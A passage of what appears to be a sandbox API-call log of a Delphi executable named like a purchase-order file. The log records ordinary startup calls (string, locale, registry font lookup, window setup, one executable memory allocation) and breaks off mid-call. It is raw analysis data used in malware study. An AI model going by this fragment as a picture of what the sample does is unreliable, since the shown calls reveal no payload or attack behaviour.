lpBuffer="Interface not supported") returned 0x17 [0106.304] LoadStringA (in: hInstance=0x38b0000, uID=0xffdc, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0106.304] LoadStringA (in: hInstance=0x38b0000, uID=0xffdd, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0106.304] LoadStringA (in: hInstance=0x38b0000, uID=0xffd0, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0106.304] LoadStringA (in: hInstance=0x38b0000, uID=0xffd8, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0106.304] LoadStringA (in: hInstance=0x38b0000, uID=0xffef, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0106.304] LoadStringA (in: hInstance=0x38b0000, uID=0xffec, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0106.304] LoadStringA (in: hInstance=0x38b0000, uID=0xffd3, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xffd2, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xffe5, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xffe6, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xffe7, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xffe4, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xffe2, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xffe0, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xffff, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xfffe, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xfffd, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xfffc, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xfffb, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xfffa, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xfff9, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xfff8, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xfff7, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xfff6, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0106.305] LoadStringA (in: hInstance=0x38b0000, uID=0xfff5, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0106.306] LoadStringA (in: hInstance=0x38b0000, uID=0xfff4, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="Invalid filename") returned 0x10 [0106.306] LoadStringA (in: hInstance=0x38b0000, uID=0xfff3, lpBuffer=0x29cebe0, cchBufferMax=4096 | out: lpBuffer="File not found") returned 0xe [0106.306] LoadStringA (in: hInstance=0x38b0000, uID=0xfff1, lpBuffer=0x29cebcc, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0106.306] LoadStringA (in: hInstance=0x38b0000, uID=0xffe1, lpBuffer=0x29cebcc, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0106.306] GetVersionExA (in: lpVersionInformation=0x29cfb64*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x20b94, dwMinorVersion=0x0, dwBuildNumber=0x20b90, dwPlatformId=0x29cfca4, szCSDVersion="¸û\x9c\x02ð,)w4") | out: lpVersionInformation=0x29cfb64*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0106.306] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74530000 [0106.307] GetProcAddress (hModule=0x74530000, lpProcName="GetDiskFreeSpaceExA") returned 0x745569d0 [0106.307] GetThreadLocale () returned 0x409 [0106.307] GetSystemMetrics (nIndex=42) returned 0 [0106.307] GetThreadLocale () returned 0x409 [0106.307] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Jan") returned 4 [0106.307] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="January") returned 8 [0106.307] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Feb") returned 4 [0106.307] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="February") returned 9 [0106.307] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Mar") returned 4 [0106.307] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="March") returned 6 [0106.307] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Apr") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="April") returned 6 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="May") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="May") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Jun") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="June") returned 5 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Jul") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="July") returned 5 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Aug") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="August") returned 7 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Sep") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="September") returned 10 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Oct") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="October") returned 8 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Nov") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="November") returned 9 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Dec") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="December") returned 9 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Sun") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Sunday") returned 7 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Mon") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Monday") returned 7 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Tue") returned 4 [0106.308] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Tuesday") returned 8 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Wed") returned 4 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Wednesday") returned 10 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Thu") returned 4 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Thursday") returned 9 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Fri") returned 4 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Friday") returned 7 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Sat") returned 4 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x29cfa3c, cchData=256 | out: lpLCData="Saturday") returned 9 [0106.309] GetThreadLocale () returned 0x409 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="$") returned 2 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="0") returned 2 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="0") returned 2 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x29cfb90, cchData=2 | out: lpLCData=",") returned 2 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x29cfb90, cchData=2 | out: lpLCData=".") returned 2 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="2") returned 2 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x29cfb90, cchData=2 | out: lpLCData="/") returned 2 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0106.309] GetThreadLocale () returned 0x409 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x29cfa64, cchData=256 | out: lpLCData="1") returned 2 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0106.309] GetThreadLocale () returned 0x409 [0106.309] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x29cfa64, cchData=256 | out: lpLCData="1") returned 2 [0106.310] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x29cfb90, cchData=2 | out: lpLCData=":") returned 2 [0106.310] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="AM") returned 3 [0106.310] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="PM") returned 3 [0106.310] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="0") returned 2 [0106.310] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="0") returned 2 [0106.310] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x29cfa98, cchData=256 | out: lpLCData="0") returned 2 [0106.310] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x29cfb90, cchData=2 | out: lpLCData=",") returned 2 [0106.310] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x743f0000 [0106.310] GetProcAddress (hModule=0x743f0000, lpProcName="VariantChangeTypeEx") returned 0x74407260 [0106.311] GetProcAddress (hModule=0x743f0000, lpProcName="VarNeg") returned 0x74452470 [0106.311] GetProcAddress (hModule=0x743f0000, lpProcName="VarNot") returned 0x744536e0 [0106.311] GetProcAddress (hModule=0x743f0000, lpProcName="VarAdd") returned 0x7442cbb0 [0106.311] GetProcAddress (hModule=0x743f0000, lpProcName="VarSub") returned 0x7442e0d0 [0106.311] GetProcAddress (hModule=0x743f0000, lpProcName="VarMul") returned 0x7442d800 [0106.312] GetProcAddress (hModule=0x743f0000, lpProcName="VarDiv") returned 0x74452980 [0106.312] GetProcAddress (hModule=0x743f0000, lpProcName="VarIdiv") returned 0x74453320 [0106.312] GetProcAddress (hModule=0x743f0000, lpProcName="VarMod") returned 0x74453580 [0106.312] GetProcAddress (hModule=0x743f0000, lpProcName="VarAnd") returned 0x74423690 [0106.312] GetProcAddress (hModule=0x743f0000, lpProcName="VarOr") returned 0x74453790 [0106.312] GetProcAddress (hModule=0x743f0000, lpProcName="VarXor") returned 0x74453930 [0106.312] GetProcAddress (hModule=0x743f0000, lpProcName="VarCmp") returned 0x74402ae0 [0106.313] GetProcAddress (hModule=0x743f0000, lpProcName="VarI4FromStr") returned 0x74405140 [0106.313] GetProcAddress (hModule=0x743f0000, lpProcName="VarR4FromStr") returned 0x74423020 [0106.313] GetProcAddress (hModule=0x743f0000, lpProcName="VarR8FromStr") returned 0x74423cd0 [0106.313] GetProcAddress (hModule=0x743f0000, lpProcName="VarDateFromStr") returned 0x74418b20 [0106.313] GetProcAddress (hModule=0x743f0000, lpProcName="VarCyFromStr") returned 0x74402280 [0106.314] GetProcAddress (hModule=0x743f0000, lpProcName="VarBoolFromStr") returned 0x744044d0 [0106.314] GetProcAddress (hModule=0x743f0000, lpProcName="VarBstrFromCy") returned 0x744231c0 [0106.314] GetProcAddress (hModule=0x743f0000, lpProcName="VarBstrFromDate") returned 0x744199f0 [0106.314] GetProcAddress (hModule=0x743f0000, lpProcName="VarBstrFromBool") returned 0x74404480 [0106.314] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x360 [0106.314] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x4dc [0106.314] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e4 [0106.315] GetDC (hWnd=0x0) returned 0xb010541 [0106.315] GetDeviceCaps (hdc=0xb010541, index=90) returned 96 [0106.315] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1 [0106.315] GetDC (hWnd=0x0) returned 0xb010541 [0106.315] GetDeviceCaps (hdc=0xb010541, index=104) returned 0 [0106.315] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1 [0106.315] CreatePalette (plpal=0x29cf7f4) returned 0xc080941 [0106.316] GetStockObject (i=7) returned 0x1b00017 [0106.316] GetStockObject (i=5) returned 0x1900015 [0106.316] GetStockObject (i=13) returned 0x18a0048 [0106.316] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0106.316] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0106.316] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", ulOptions=0x0, samDesired=0x20019, phkResult=0x29cfad0 | out: phkResult=0x29cfad0*=0x4e8) returned 0x0 [0106.316] RegQueryValueExA (in: hKey=0x4e8, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x29cfaa0, lpData=0x0, lpcbData=0x29cfabc*=0x0 | out: lpType=0x29cfaa0*=0x1, lpData=0x0, lpcbData=0x29cfabc*=0x7) returned 0x0 [0106.317] RegQueryValueExA (in: hKey=0x4e8, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x29cfab8, lpData=0x3a6c308, lpcbData=0x29cfac8*=0x7 | out: lpType=0x29cfab8*=0x1, lpData="Tahoma", lpcbData=0x29cfac8*=0x7) returned 0x0 [0106.317] RegCloseKey (hKey=0x4e8) returned 0x0 [0106.317] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x76300000 [0106.317] GetVersion () returned 0x23f00206 [0106.317] GetCurrentProcessId () returned 0x12b8 [0106.317] GlobalAddAtomA (lpString="Delphi000012B8") returned 0xc089 [0106.317] GetCurrentThreadId () returned 0x674 [0106.317] GlobalAddAtomA (lpString="ControlOfs038B000000000674") returned 0xc102 [0106.317] RegisterClipboardFormatA (lpszFormat="ControlOfs038B000000000674") returned 0xc1dd [0106.318] GetProcAddress (hModule=0x76300000, lpProcName="GetMonitorInfoA") returned 0x76317e40 [0106.318] GetProcAddress (hModule=0x76300000, lpProcName="GetSystemMetrics") returned 0x76319160 [0106.318] GetSystemMetrics (nIndex=19) returned 1 [0106.318] GetSystemMetrics (nIndex=75) returned 1 [0106.318] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x3a73418, fWinIni=0x0 | out: pvParam=0x3a73418) returned 1 [0106.318] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0106.318] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0106.318] LoadCursorA (hInstance=0x38b0000, lpCursorName=0x7ff9) returned 0x70225 [0106.322] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0106.323] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0106.323] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0106.323] LoadCursorA (hInstance=0x38b0000, lpCursorName=0x7ffa) returned 0x14012d [0106.324] LoadCursorA (hInstance=0x38b0000, lpCursorName=0x7ffb) returned 0x402ab [0106.325] LoadCursorA (hInstance=0x38b0000, lpCursorName=0x7ffc) returned 0x2f0087 [0106.325] LoadCursorA (hInstance=0x38b0000, lpCursorName=0x7ffd) returned 0x30221 [0106.326] LoadCursorA (hInstance=0x38b0000, lpCursorName=0x7fff) returned 0x90367 [0106.327] LoadCursorA (hInstance=0x38b0000, lpCursorName=0x7ffe) returned 0x7017d [0106.327] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0106.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0106.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0106.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0106.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0106.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0106.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0106.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0106.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0106.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0106.328] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0106.328] GetDC (hWnd=0x0) returned 0xb010541 [0106.328] GetDeviceCaps (hdc=0xb010541, index=90) returned 96 [0106.328] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1 [0106.329] GetProcAddress (hModule=0x76300000, lpProcName="EnumDisplayMonitors") returned 0x76338d90 [0106.420] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x38fa120, dwData=0x3a6c3d8) returned 1 [0106.420] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x29cfb5b, fWinIni=0x0 | out: pvParam=0x29cfb5b) returned 1 [0106.421] CreateFontIndirectA (lplf=0x29cfb5b) returned 0x150a0940 [0106.421] GetObjectA (in: h=0x150a0940, c=60, pv=0x29cf948 | out: pv=0x29cf948) returned 60 [0106.421] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x29cfa07, fWinIni=0x0 | out: pvParam=0x29cfa07) returned 1 [0106.422] CreateFontIndirectA (lplf=0x29cfae3) returned 0x2d0a0963 [0106.423] GetObjectA (in: h=0x2d0a0963, c=60, pv=0x29cf948 | out: pv=0x29cf948) returned 60 [0106.423] CreateFontIndirectA (lplf=0x29cfaa7) returned 0x5f0a0697 [0106.423] GetObjectA (in: h=0x5f0a0697, c=60, pv=0x29cf948 | out: pv=0x29cf948) returned 60 [0106.423] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0106.423] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x29cfabb, nSize=0x100 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe")) returned 0x2f [0106.423] OemToCharA (in: pSrc="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe", pDst=0x29cfabb | out: pDst="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe") returned 1 [0106.423] GetClassInfoA (in: hInstance=0x38b0000, lpClassName="TPUtilWindow", lpWndClass=0x29cfa68 | out: lpWndClass=0x29cfa68) returned 0 [0106.424] RegisterClassA (lpWndClass=0x3907b0c) returned 0xc1d6 [0106.424] CreateWindowExA (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x38b0000, lpParam=0x0) returned 0x801d8 [0106.427] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x2140000 [0106.427] SetWindowLongA (hWnd=0x801d8, nIndex=-4, dwNewLong=34869231) returned 59470780 [0106.428] GetKeyboardLayoutList (in: nBuff=64, lpList=0x29cfa3c | out: lpList=0x29cfa3c) returned 1 [0106.429] GetModuleHandleA (lpModuleName="USER32") returned 0x76300000 [0106.429] GetProcAddress (hModule=0x76300000, lpProcName="AnimateWindow") returned 0x76328ef0 [0106.429] LoadStringA (in: hInstance=0x38b0000, uID=0xff44, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Alt+") returned 0x4 [0106.429] LoadStringA (in: hInstance=0x38b0000, uID=0xff43, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Ctrl+") returned 0x5 [0106.429] LoadStringA (in: hInstance=0x38b0000, uID=0xff42, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Shift+") returned 0x6 [0106.429] LoadStringA (in: hInstance=0x38b0000, uID=0xff41, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Del") returned 0x3 [0106.429] LoadStringA (in: hInstance=0x38b0000, uID=0xff40, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Ins") returned 0x3 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff5f, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Down") returned 0x4 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff5e, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Right") returned 0x5 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff5d, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Up") returned 0x2 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff5c, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Left") returned 0x4 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff5b, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Home") returned 0x4 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff5a, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="End") returned 0x3 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff59, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="PgDn") returned 0x4 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff58, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="PgUp") returned 0x4 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff57, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Space") returned 0x5 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff56, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Enter") returned 0x5 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff55, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Esc") returned 0x3 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff54, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="Tab") returned 0x3 [0106.430] LoadStringA (in: hInstance=0x38b0000, uID=0xff53, lpBuffer=0x29cebf0, cchBufferMax=4096 | out: lpBuffer="BkSp") returned 0x4 [0106.430] CompareStringA (Locale=0x800, dwCmpFlags=0x1, lpString1="TComponent", cchCount1=10, lpString2="TPersistent", cchCount2=11) returned 1 [0106.431] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6cc90000 [0106.431] GetProcAddress (hModule=0x6cc90000, lpProcName="InitializeFlatSB") returned 0x6ccbecf0 [0106.431] GetProcAddress (hModule=0x6cc90000, lpProcName="UninitializeFlatSB") returned 0x6ccbef90 [0106.431] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_GetScrollProp") returned 0x6ccbbf70 [0106.432] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_SetScrollProp") returned 0x6ccbe6f0 [0106.432] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_EnableScrollBar") returned 0x6ccbbd70 [0106.432] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_ShowScrollBar") returned 0x6ccbea50 [0106.432] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_GetScrollRange") returned 0x6ccbc0e0 [0106.432] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_GetScrollInfo") returned 0x6ccbbe20 [0106.433] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_GetScrollPos") returned 0x6ccbbf10 [0106.433] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_SetScrollPos") returned 0x6ccbe660 [0106.433] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_SetScrollInfo") returned 0x6ccbe590 [0106.433] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_SetScrollRange") returned 0x6ccbe960 [0106.433] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0d6 [0106.433] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc158 [0106.434] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc1c0 [0106.434] GetCurrentThreadId () returned 0x674 [0106.434] GlobalAddAtomA (lpString="WndProcPtr038B000000000674") returned 0xc101 [0106.434] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc150 [0106.434] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1d5 [0106.434] GetModuleHandleA (lpModuleName="User32.dll") returned 0x76300000 [0106.434] GetProcAddress (hModule=0x76300000, lpProcName="SetLayeredWindowAttributes") returned 0x7633cbc0 [0106.434] RegisterClipboardFormatA 